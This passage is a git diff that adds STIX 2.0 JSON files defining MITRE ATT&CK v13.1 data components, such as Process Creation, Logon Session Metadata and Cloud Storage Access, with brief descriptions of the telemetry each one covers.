@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--414a150e-540f-47de-8728-0271a83d8355", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json new file mode 100644 index 0000000000000000000000000000000000000000..bbb10805a9dcc720f942e2ee2de62034fb4bbab7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ef88d824-d48d-4cdd-b0f0-9d4befd44231", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Volume Deletion", + "description": "Removal of a a cloud volume (ex: AWS delete-volume)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json new file mode 100644 index 0000000000000000000000000000000000000000..84c0d3628e3066a4f005ad09c69f594335b6268d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--666d1d5c-1fac-4790-9abc-ac9b12b4bf23", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json new file mode 100644 index 0000000000000000000000000000000000000000..c755ed9cf7a64f5da32b12e11bcba01c571835a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--07877762-0806-47d2-a682-5348b8f802af", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json new file mode 100644 index 0000000000000000000000000000000000000000..9a22c480173dcf7693a5a3503236793e00469b8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json 
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--f6518a1d-5d8a-4bf3-adcf-4c6d85b1d2a0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Snapshot Creation",
+ "description": "Initial construction of a new snapshot (ex: AWS create-snapshot)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json
new file mode 100644
index 0000000000000000000000000000000000000000..3bf97ae3af632561210df9de0930623ac2eacb96
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--15375ae3-a4ea-4096-8b8a-d8e0e7cc8a2a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Cloud Storage Modification",
+ "description": "Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json
new file mode 100644
index 0000000000000000000000000000000000000000..b853e044c95acf88d9331be983a28ac596d8f681
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--62fc1325-f9cf-40e6-a3e6-2193cd283595",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Instance Modification",
+ "description": "Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json
new file mode 100644
index 0000000000000000000000000000000000000000..d2747100a1fb35f61c6cab8e1008e9af8dbbdeba
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--343ba7c6-3f02-4379-bd5a-354516d4da6b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Instance Metadata",
+ "description": "Contextual data about an instance and activity around it such as name, type, or status",
+ "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json
new file mode 100644
index 0000000000000000000000000000000000000000..ecf5c6eb1e4c285484bad158c46ba5c4da62be40
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--0c24df7c-359c-4925-8ea2-33af4d10b8d0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Cloud Storage Deletion",
+ "description": "Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json
new file mode 100644
index 0000000000000000000000000000000000000000..c9f1391dfbfa3d9587332152352b9957959149b9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--93e976f5-2cac-4c86-ab16-900d5fa2e005",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Drive Modification",
+ "description": "Changes made to a drive letter or mount point of a data storage device",
+ "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json
new file mode 100644
index 0000000000000000000000000000000000000000..2c35707b318b02e6a188e58cf9125346f812a80b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--d4968d83-4420-4d1c-be48-4a45c3c78231",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Pod Creation",
+ "description": "Initial construction of a new pod (ex: kubectl apply|run)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json
new file mode 100644
index 0000000000000000000000000000000000000000..4e5ef977b3b935c794fc2b6b5c2cb36982c95d9b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--c6d1a1af-5e2d-42a9-8904-14b6dd9763ce",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Service Creation",
+ "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json
new file mode 100644
index 0000000000000000000000000000000000000000..f4f0b8c9d2da63c2434322a13065553766182275
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--507040a8-fa9a-409e-882f-90cbf38ca6bd",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Cloud Storage Access",
+ "description": "Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json
new file mode 100644
index 0000000000000000000000000000000000000000..b13c3aaa676224b108e8224d519b1fc1095b97ae
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--64566dbd-50b6-4191-b4c2-857f6b7f3afb",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Cloud Storage Creation",
+ "description": "Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json
new file mode 100644
index 0000000000000000000000000000000000000000..dfe7b781fdde95773989d851ce10e14d09d33cb7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--7a25bbd6-0789-44be-89c6-6a66aecbc444",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Active Directory Object Modification",
+ "description": "Changes made to an active directory object (ex: Windows EID 5163 or 5136)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json
new file mode 100644
index 0000000000000000000000000000000000000000..e37bea74e53a74bbb507a4a0b3681569020655a5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--edb364e9-6cd6-455b-abfe-69e9d16679c3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Active Directory Object Access",
+ "description": "Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json
new file mode 100644
index 0000000000000000000000000000000000000000..79f99cd3ec4be78e66b85fc68bd3be61e257fb15
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--60c0c2ba-950d-46c8-948b-39ab3533e79c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Web Credential Creation",
+ "description": "Initial construction of new web credential material (ex: Windows EID 1200 or 4769)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json
new file mode 100644
index 0000000000000000000000000000000000000000..feffc413a7cc9ebd88fd553f1eedd7109eca31b2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--7ce659e6-4a5a-41f1-bf46-9a70b54c8bc4",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Container Start",
+ "description": "Activation or invocation of a container (ex: docker start or docker restart)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json
new file mode 100644
index 0000000000000000000000000000000000000000..f69526c58293a12f6eccf805d19b2c7d96b6c450
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--d74e1de1-ee28-40e4-841c-f21da9cbc660",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Process Termination",
+ "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)",
